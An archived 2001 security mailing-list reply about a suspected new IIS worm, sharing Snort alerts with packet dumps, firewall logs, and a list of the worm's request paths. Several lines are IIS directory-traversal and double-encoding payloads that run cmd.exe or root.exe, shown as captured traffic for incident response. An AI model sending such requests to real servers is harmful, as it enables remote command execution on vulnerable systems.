Re: New Worm ?

From: Billy Smith (bsmithat_private)
Date: Tue Sep 18 2001 - 08:08:52 PDT
Next message: Ed Shirley: "Re: New Worm ?"
Previous message: Pedro Miller Rabinovitch: "New worm? 'readme.eml'"
In reply to: Cory McIntire: "New Worm ?"
Next in thread: Ed Shirley: "Re: New Worm ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I think the answer is yes.  We are seeing the following information in our SOC:

Snort logs

[**] WEB-IIS cmd.exe access [**]
09/18-054534.986956 0164F0E454 -> 0E018C13264 type0x800 len0x86
24.78.160.1562199 -> 24.31.204.380 TCP TTL114 TOS0x0 ID55463 IpLen20 
DgmLen120 DF
***AP*** Seq 0x258331C6  Ack 0x3FFA2A2F  Win 0x4470  TcpLen 20
0x0000 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010 00 78 D8 A7 40 00 72 06 92 CB 18 4E A0 9C 18 1F  .x..@.r....N....
0x0020 CC 03 08 97 00 50 25 83 31 C6 3F FA 2A 2F 50 18  .....P%.1.?.*/P.
0x0030 44 70 EF A3 00 00 47 45 54 20 2F 63 2F 77 69 6E  Dp....GET /c/win
0x0040 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E  nt/system32/cmd.
0x0050 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F  exe?/c+dir HTTP/
0x0060 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host www..
0x0070 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection clo
0x0080 73 65 0D 0A 0D 0A


[**] WEB-IIS CodeRed v2 root.exe access [**]
09/18-054852.527517 0164F0E454 -> 0E018C13264 type0x800 len0x7E
24.31.249.2433944 -> 24.31.204.380 TCP TTL119 TOS0x0 ID14269 IpLen20 
DgmLen112 DF
***AP*** Seq 0x5F36CF2E  Ack 0x4C70EEFF  Win 0x4470  TcpLen 20
0x0000 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010 00 70 37 BD 40 00 77 06 D5 95 18 1F F9 F3 18 1F  .p7.@.w.........
0x0020 CC 03 0F 68 00 50 5F 36 CF 2E 4C 70 EE FF 50 18  ...h.P_6..Lp..P.
0x0030 44 70 1E 7E 00 00 47 45 54 20 2F 73 63 72 69 70  Dp.~..GET /scrip
0x0040 74 73 2F 72 6F 6F 74 2E 65 78 65 3F 2F 63 2B 64  ts/root.exe?/c+d
0x0050 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73  ir HTTP/1.0..Hos
0x0060 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74  t www..Connnect
0x0070 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A        ion close....

[**] WEB-IIS multiple decode attempt [**]
09/18-053753.664407 0164F0E454 -> 0E018C13264 type0x800 len0x96
24.148.70.1923874 -> 24.31.204.380 TCP TTL115 TOS0x0 ID47185 IpLen20 
DgmLen136 DF
***AP*** Seq 0xF74A5E62  Ack 0x22C29B6D  Win 0x4470  TcpLen 20
0x0000 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010 00 88 B8 51 40 00 73 06 0B A8 18 94 46 C0 18 1F  ...Q@.s.....F...
0x0020 CC 03 0F 22 00 50 F7 4A 5E 62 22 C2 9B 6D 50 18  ...".P.J^b"..mP.
0x0030 44 70 BB B4 00 00 47 45 54 20 2F 73 63 72 69 70  Dp....GET /scrip
0x0040 74 73 2F 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E 74  ts/..%5c../winnt
0x0050 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78  /system32/cmd.ex
0x0060 65 3F 2F 63 2B 64 69 72 20 72 20 48 54 54 50 2F  e?/c+dir r HTTP/
0x0070 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host www..
0x0080 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection clo
0x0090 73 65 0D 0A 0D 0A                                se....

[**] WEB-IIS multiple decode attempt [**]
09/18-053254.915136 0164F0E454 -> 0E018C13264 type0x800 len0xAB
24.31.191.1502085 -> 24.31.204.380 TCP TTL120 TOS0x0 ID57280 IpLen20 
DgmLen157 DF
***AP*** Seq 0x57D5CE8D  Ack 0x10F1D744  Win 0x4470  TcpLen 20
0x0000 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010 00 9D DF C0 40 00 78 06 66 C2 18 1F BF 96 18 1F  ....@.x.f.......
0x0020 CC 03 08 25 00 50 57 D5 CE 8D 10 F1 D7 44 50 18  ...%.PW......DP.
0x0030 44 70 95 DC 00 00 47 45 54 20 2F 5F 76 74 69 5F  Dp....GET /_vti_
0x0040 62 69 6E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35  bin/..%5c../..%5
0x0050 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 77 69 6E 6E  c../..%5c../winn
0x0060 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
0x0070 78 65 3F 2F 63 2B 64 69 72 20 63 2B 64 69 72 20  xe?/c+dir c+dir
0x0080 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20  HTTP/1.0..Host
0x0090 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E  www..Connnection
0x00A0 3A 20 63 6C 6F 73 65 0D 0A 0D 0A                  close....


[**] WEB-IIS cmd.exe access [**]
09/18-053803.680933 0164F0E454 -> 0E018C13264 type0x800 len0x97
24.148.70.1921184 -> 24.31.204.380 TCP TTL115 TOS0x0 ID57825 IpLen20 
DgmLen137 DF
***AP*** Seq 0xFA046B6A  Ack 0x24060DCB  Win 0x4470  TcpLen 20
0x0000 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010 00 89 E1 E1 40 00 73 06 E2 16 18 94 46 C0 18 1F  ....@.s.....F...
0x0020 CC 03 04 A0 00 50 FA 04 6B 6A 24 06 0D CB 50 18  .....P..kj$...P.
0x0030 44 70 CB F7 00 00 47 45 54 20 2F 73 63 72 69 70  Dp....GET /scrip
0x0040 74 73 2F 2E 2E 25 63 2E 2E 2F 77 69 6E 6E 74 2F  ts/..%c../winnt/
0x0050 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65  system32/cmd.exe
0x0060 3F 2F 63 2B 64 69 72 20 64 69 72 20 48 54 54 50  ?/c+dir dir HTTP
0x0070 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D  /1.0..Host www.
0x0080 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C  .Connnection cl
0x0090 6F 73 65 0D 0A 0D 0A


[**] WEB-IIS cmd.exe access [**]
09/18-052751.049990 0164F0E454 -> 0E018C13264 type0x800 len0x96
24.31.144.952571 -> 24.31.204.380 TCP TTL117 TOS0x0 ID35424 IpLen20 
DgmLen136 DF
***AP*** Seq 0x962131B0  Ack 0xFDE60AF6  Win 0x4470  TcpLen 20
0x0000 00 E0 18 C1 32 64 00 01 64 F0 E4 54 08 00 45 00  ....2d..d..T..E.
0x0010 00 88 8A 60 40 00 75 06 EE 6E 18 1F 90 5F 18 1F  ...`@.u..n..._..
0x0020 CC 03 0A 0B 00 50 96 21 31 B0 FD E6 0A F6 50 18  .....P.!1.....P.
0x0030 44 70 BD CC 00 00 47 45 54 20 2F 73 63 72 69 70  Dp....GET /scrip
0x0040 74 73 2F 2E 2E 25 32 66 2E 2E 2F 77 69 6E 6E 74  ts/..%2f../winnt
0x0050 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78  /system32/cmd.ex
0x0060 65 3F 2F 63 2B 64 69 72 20 72 20 48 54 54 50 2F  e?/c+dir r HTTP/
0x0070 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host www..
0x0080 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection clo
0x0090 73 65 0D 0A 0D 0A

Gauntlet Firewall Logs

Sep 18 083149 customer.org http-gw[26495] log host=nodnsquery/209.232.44.32 
protocol=http cmd=get dest=X.X.X.X path=/c/winnt/system32/cmd.exe?/c+dir 
ID=26495154760
Sep 18 083537 customer.org http-gw[24740] log 
host=nodnsquery/208.223.178.253 protocol=http cmd=get dest=Y.Y.Y.Y 
path=/scripts/root.exe?/c+dir ID=24740140245


Possible worms performing all the old IIS exploits

/MSADC/root.exe?/c+dir
/_mem_bin/..%25255c../..%25255c../..%25255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25255c../..%25255c../..%25255c../winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/msadc/..%25255c../..%25255c../..%25255c/..%25c1%251c../..%25c1%251c../..%25c1%251c../winnt/system32/cmd.exe?/c+dir 

/msadc/..%25255c../..%25255c../..%25255c/..%25c1%251c../..%25c1%251c../..%25c1%251c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%2535%2563../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%2535c../winnt/system32/cmd.exe?/c+dir
/scripts/..%2525%2535%2563../winnt/system32/cmd.exe?/c+dir
/scripts/..%25252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%25255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25c0%252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%25c0%25af../winnt/system32/cmd.exe?/c+dir
/scripts/..%25c1%251c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25c1%259c../winnt/system32/cmd.exe?/c+dir
/scripts/root.exe?/c+dir

This hasn't been confirmed yet, but we have heard information indicating 
that this worm might be infecting IIS servers with mobile code.  When 
someone browses to an infected server, this code is downloaded to the 
browser.  Once a browser is infected, this code might be infecting other 
IIS servers.

Billy Smith
Research and Development
LURHQ Corporation



At 09:43 AM 9/18/2001 -0500, Cory McIntire wrote:
>Hello,
>I and a few others I know are getting bombard on our machines with IIS
>requests....looks like another worm, and its much smarter than before, it
>seems to stay within the same class A and sometimes the same class B as the
>attacking machine is in. here is an excerpt of what i believe is the full
>scan....
>
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>
>just thought I would let you guys know...this one looks bad fella.....thank
>god for apache.....that is of course, if there isnt a huge bog down on the
>net....=[
>
>cory
>
>-----------------------------------------------------------------
>This list is provided by the SecurityFocus ARIS analyzer service.
>For more information on this free incident handling, management
>and tracking system please see: http://aris.securityfocus.com


-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: Ed Shirley: "Re: New Worm ?"
Previous message: Pedro Miller Rabinovitch: "New worm? 'readme.eml'"
In reply to: Cory McIntire: "New Worm ?"
Next in thread: Ed Shirley: "Re: New Worm ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 08:57:53 PDT